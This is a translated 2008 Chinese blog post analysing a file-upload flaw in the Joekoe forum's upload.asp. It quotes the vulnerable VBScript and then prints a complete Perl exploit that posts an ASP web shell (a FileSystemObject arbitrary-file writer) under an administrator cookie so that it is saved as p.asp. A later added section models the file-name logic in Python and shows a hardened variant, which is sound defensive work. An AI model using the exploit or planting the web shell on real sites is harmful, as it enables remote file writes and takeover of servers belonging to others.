
A simple analysis of the Joekoe forum (乔客论坛) upload.asp file

Published: 2008-11-29 18:01:41    Posted by: 源代码网



Author: xiaolu      From: http://666w.com

Preface: Yesterday, while browsing the 黑防 website, I saw that issue 8 of 黑防 carried an article titled 《乔客论坛惊爆UPfile严重漏洞》 ("Joekoe forum hit by a serious UPfile vulnerability"). Unfortunately I cannot buy 黑防 where I live, so I had to analyse it myself. What follows applies to the free 6.6 version of the Joekoe full-site program (乔客整站程序).
    First, the relevant lines of upload.asp:

<%
' Excerpt of upload.asp: only the lines relevant to the upload check are shown.
' upload.form(...) and upfile.SaveAs come from the site's upload component (not shown).
dim formname,upload_path,upload_type,upload_size,uup
' whitelist of permitted target sub-directories
uup="|article|down|forum|gallery|news|other|product|video|website|"

  ' values submitted with the multipart form
  up_name=trim(upload.form("up_name"))
  up_text=trim(upload.form("up_text"))
  up_path=trim(upload.form("up_path"))
  ' only an administrator session may supply a file name longer than 2 characters
  if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
  ' short or empty names get a timestamp appended
  if len(up_name)<3 then up_name=up_name&upload_time(now_time)
  ' any directory not in the whitelist falls back to "other"
  if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
  if len(up_path)<3 then up_path="other"
  uppath=up_path
  if right(upload_path,1)<>"/" then upload_path=upload_path&"/"
  up_path=server.mappath(upload_path&up_path)

      ' extension = everything after the FIRST "." in the uploaded file name
      upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
      upfile_name=lcase(upfile_name)
      ' the extension must appear in the comma-separated upload_type list
      if instr(","&upload_type&",",","&upfile_name&",")>0 then
        upfile_name2=upfile_name
        ' final name = client-supplied up_name & "." & extension
        upfile_name=up_name&"."&upfile_name
        upfile.SaveAs up_path&upfile_name
      else
        uptemp="<font class=red_2>上传失败</font>:文件类型只能为:"&replace(upload_type,"|","、")&"等格式) "&go_back
      end if

Look at the submitted variables: up_name, up_path, up_text and upfile_name. Start with the up_path part, which is this line:
if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
Whenever the value of up_path is not contained in uup, that is, not one of:
article,down,forum,gallery,news,other,product,video,website
up_path simply becomes the other directory, so there is nothing for us to work with here. Next, upfile_name, the file extension:
upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
This filter is fairly strict: in effect the file name may contain only one "." character. A name such as asp.asp.gif is also treated as illegal, because the extension is taken from the first "." through to the end of the name. Give up on this one. It is also obvious from the code that up_text is of no use to us. That leaves only up_name:

  if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
  if len(up_name)<3 then up_name=up_name&upload_time(now_time)

If we have not logged in to the back end as an administrator, i.e. session("joekoe_online_admin")<>"joekoe_admin", then as soon as up_name is longer than 2 characters it is set to an empty string. Frustrating. But when session("joekoe_online_admin")="joekoe_admin" we can make use of it. The program is as follows (the cookie must be an administrator's):


#!/usr/bin/perl
# Proof-of-concept request from the article: a hand-built multipart POST to
# upload.asp?action=upfile with an admin-chosen up_name. The Cookie header
# must carry an administrator session, as explained in the text above.
$| = 1;
use Socket;
$host = "10.0.0.1";
$port = "80";

# multipart/form-data body; every line ends in CRLF, as HTTP requires
$str =
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_path\"\r\n".
"\r\n".
"gallery\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_name\"\r\n".
"\r\n".
"p.asp\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_text\"\r\n".
"\r\n".
"spic\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"file_name1\"; filename=\"F:\\tools\\sql\\getwebs\\p.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"<%dim objFSO%>\r\n".
"<%dim fdata%>\r\n".
"<%dim objCountFile%>\r\n".
"<%on error resume next%>\r\n".
"<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n".
"<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n".
"<%fdata = request(\"cyfddata\")%>\r\n".
"<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n".
"<%objCountFile.Write fdata%>\r\n".
"<%if err =0 then%>\r\n".
"<%response.write \"<font color=red>save Success!</font>\"%>\r\n".
"<%else%>\r\n".
"<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n".
"<%end if%>\r\n".
"<%err.clear%>\r\n".
"<%end if%>\r\n".
"<%objCountFile.Close%>\r\n".
"<%Set objCountFile=Nothing%>\r\n".
"<%Set objFSO = Nothing%>\r\n".
"<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"submit\"\r\n".
"\r\n".
"点击上传\r\n".
"-----------------------------7d41869a401aa\r\n".
"\r\n";
print $str;
$len=length($str);

# request line and headers; the commented-out headers come from the author's
# browser capture and are not required
$req ="POST /jj/upload.asp?action=upfile HTTP/1.0\r\n".
#"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n".
"Referer: http://10.0.0.1/jj/upload.asp?uppath=gallery&upname=gs200483164242&uptext=spic\r\n".
#"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41869a401aa\r\n".
#"Accept-Encoding: gzip, deflate\r\n".
#"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n".
"Host: 10.0.0.1\r\n".
"Content-Length: $len\r\n".
#"Connection: Keep-Alive\r\n".
#"Cache-Control: no-cache\r\n".
"Cookie: ASPSESSIONIDQAQQRCTQ=DOKDHBIALDIDGJFJMCMMIBFJ; joekoe%5Fonline=login%5Fpassword=dd15f89d35c36afb&guest%5Fname=&login%5Fusername=joekoe&counters=yes\r\n".
"\r\n".
"$str";
print $req;
@res = sendraw($req);
print @res;

# Hmm... maybe you can send it some other way

# open a raw TCP connection, write the request and return the response lines
sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")||0) || die("Socket problems\n");
    # sockaddr_in packed by hand (family 2 = AF_INET), as in the original
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}
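The file-name logic traced above decides whether this is exploitable, so here it is as a small Python model, placed beside a hardened variant. This is an added example written for this page, not code from Joekoe or from the author: `original_extension` and `original_saved_name` mirror the VBScript shown earlier (first-dot extension, directory whitelist, admin-only `up_name`), while `hardened_saved_name`, `ALLOWED_EXT` (the page never shows the real `upload_type` value) and the `name_source` parameter are assumptions of mine. The hardened version never lets the client choose the base name at all, which is the property the original lacks.

```python
import os
import re
import secrets

# Constructed for this example: the uup whitelist from the page and an assumed
# upload_type list (the actual value is not on the page).
UUP = "|article|down|forum|gallery|news|other|product|video|website|"
ALLOWED_DIRS = set(UUP.strip("|").split("|"))
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png", "zip", "rar"}  # assumed upload_type


def original_extension(upfilename: str) -> str:
    """Model of Right(upfilename, len - Instr(upfilename, ".")): everything
    after the FIRST dot. With no dot, Instr returns 0 and the whole name is used."""
    i = upfilename.find(".")
    return (upfilename if i < 0 else upfilename[i + 1:]).lower()


def original_saved_name(up_name, up_path, upfilename, is_admin, now="20081129180141"):
    """Model of the page's logic. Returns the relative path that would be saved,
    or None when the extension check rejects the upload."""
    up_name = up_name.strip()
    if not is_admin and len(up_name) > 2:
        up_name = ""                        # non-admins lose any chosen name
    if len(up_name) < 3:
        up_name = up_name + now             # stand-in for upload_time(now_time)
    up_path = up_path.strip()
    if "|" + up_path + "|" not in UUP:      # substring test, as on the page
        up_path = "other"
    if len(up_path) < 3:                    # redundant after the whitelist, kept for fidelity
        up_path = "other"
    ext = original_extension(upfilename)
    if ext not in ALLOWED_EXT:
        return None
    # an admin-chosen up_name goes straight into the stored file name
    return f"{up_path}/{up_name}.{ext}"


SAFE_DIR = re.compile(r"^[a-z]+$")


def hardened_saved_name(up_path, upfilename, name_source=lambda: secrets.token_hex(8)):
    """Hardened variant (assumption, not Joekoe code): the client controls neither
    the base name nor the directory spelling; only the extension survives, taken
    from the LAST dot of the basename, and the base name is generated server-side."""
    if not SAFE_DIR.match(up_path) or up_path not in ALLOWED_DIRS:
        up_path = "other"                   # exact membership, not a substring test
    if "\0" in upfilename:
        return None                         # NUL bytes can truncate names in older stacks
    base = re.split(r"[\\/]", upfilename)[-1]   # drop any client-side path, either separator
    ext = os.path.splitext(base)[1].lstrip(".").lower()
    if ext not in ALLOWED_EXT:
        return None
    return f"{up_path}/{name_source()}.{ext}"


if __name__ == "__main__":
    # what the page's code does with an admin session versus without one
    print(original_saved_name("p.asp", "gallery", "p.gif", is_admin=False, now="T"))
    print(original_saved_name("p.asp", "gallery", "p.gif", is_admin=True, now="T"))
    print(hardened_saved_name("gallery", "F:\\tools\\p.asp.gif", name_source=lambda: "n1"))
```

The model makes the author's observations checkable: `asp.asp.gif` is rejected because the first-dot rule yields `asp.gif`, a non-admin's `p.asp` collapses to the timestamp, and only an admin session gets `p.asp` into the stored name. The hardened function shows the defensive answer: generate the base name on the server, whitelist the directory by exact match, and derive the extension from the last dot of the basename only.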
Postscript: extremely frustrated... Can anyone show me the 黑防 article?